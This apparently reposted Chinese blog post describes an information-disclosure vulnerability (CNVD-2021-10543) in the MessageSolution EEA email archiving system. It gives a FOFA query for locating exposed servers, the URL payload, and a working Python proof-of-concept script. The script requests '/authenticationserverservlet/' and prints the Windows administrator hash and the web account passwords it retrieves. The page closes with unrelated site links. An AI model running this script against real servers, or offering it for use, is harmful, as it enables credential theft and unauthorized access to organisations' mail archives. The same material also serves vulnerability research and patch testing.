MessageSolution 邮件归档系统EEA 信息泄露(CNVD-2021-10543)

其他 2021-03-30 01:14:06 阅读次数: 0

0x01 前言

MessageSolution是企业电子邮件归档软件的开发商。MessageSolution企业邮件归档管理系统EEA存在信息泄露漏洞。

0x02 漏洞影响

攻击者可利用漏洞获取Windows服务器administrator hash与web账号密码等敏感信息。

0x03 fofa查询语句

title="MessageSolution Enterprise Email Archiving (EEA)"
在这里插入图片描述

0x04 漏洞复现

访问网站页面如图
在这里插入图片描述
在这里插入图片描述

payload
http://ip/authenticationserverservlet/
构造url访问页面
在这里插入图片描述
使用获取到的web账户密码登陆
在这里插入图片描述
在这里插入图片描述

使用BurpSuite抓取的数据包
在这里插入图片描述

0x05 POC脚本

在这里插入图片描述

# CNVD-2021-10543
# MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞
# fofa: title="MessageSolution"

import requests
import time
import json
from bs4 import BeautifulSoup
# 忽略SSL证书校验提醒
requests.packages.urllib3.disable_warnings()

def title():
    print("+-------------------------------------------------+")
    print("+-----------    CNVD-2021-10543   ----------------+")
    print("+----------- MessageSolution信息泄漏 --------------+")
    print('+--------- Fofa: title="MessageSolution" ---------+')
    print("+--------  use: python3 CNVD-2021-10543.py -------+")
    print("+-------------------------------------------------+")

def target_url(url):
    target_url = url + "/authenticationserverservlet/"
    login_url = url + "/indexcommon.jsp"
    # verify = False 忽略SSL证书校验
    try:
        res = requests.get(url=target_url, verify=False,timeout=5)
        if "administrator" in res.text and res.status_code == 200:
            print(f"[!] \033[31m目标系统: {url} 存在信息泄漏\033[0m")
            time.sleep(1)
            print("[!] \033[31m正在获取目标系统敏感信息.........\033[0m")
            bs_xml = BeautifulSoup(res.text,features="html.parser")
            administratorusername = bs_xml.findAll('administratorusername')
            administratorpassword_hash = bs_xml.findAll('administratorpassword')
            user_names = bs_xml.findAll('username')
            passwords = bs_xml.findAll('password')
            i = 1
            print(f"[!] \033[31m获取到目标系统信息:\033[0m")
            print(f"\033[32m[0] 获取windows系统用户和hash\033[0m")
            print(f"用户名: {administratorusername[0].text}    hash: {administratorpassword_hash[0].text}")
            print(f"\033[32m[1] Web用户和密码\033[0m")
            if i < len(user_names):
                for user_name,password  in zip(user_names,passwords):
                    print(f"用户名: {user_name.text}    密  码: {password.text}")
                    i = i+1
            else:
                print(f"用户名: {user_names[0].text}    密  码: {passwords[0].text}")
            print(f"[!]\033[31m请访问: {login_url} 进行登录!")
        else:
            print(f"[0]\033[32m目标系统: {url} 不存在信息泄\033[0m")
    except Exception as e:
        print(f"[!]  目标系统: {url} 出现意外错误:\n {e}")




if __name__ == "__main__":
    title()
    url = str(input("[0] 请输入目标站点URL:\n"))
    target_url(url)

猜你喜欢

转载自blog.csdn.net/weixin_44146996/article/details/115315460
今日推荐
周排行
联发科MT6139射频处理器工作原理分析
LeetCode-191. 位1的个数
kubernetes中挂载glusterfs并使用
MetricBeat(win/linux)部署 系统CPU内存等资源情况监控
京东,想说爱你,并不容易!
CSS文本笔录
标题栏和状态栏同色
[校内互测]20170402
#3194. 去月球
gitlab学习(7)---gitlab数据恢复
每日归档
更多
2024-06-15(0)
2024-06-14(0)
2024-06-13(0)
2024-06-12(0)
2024-06-11(0)
2024-06-10(0)
2024-06-09(0)
2024-06-08(0)
2024-06-07(0)
2024-06-06(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022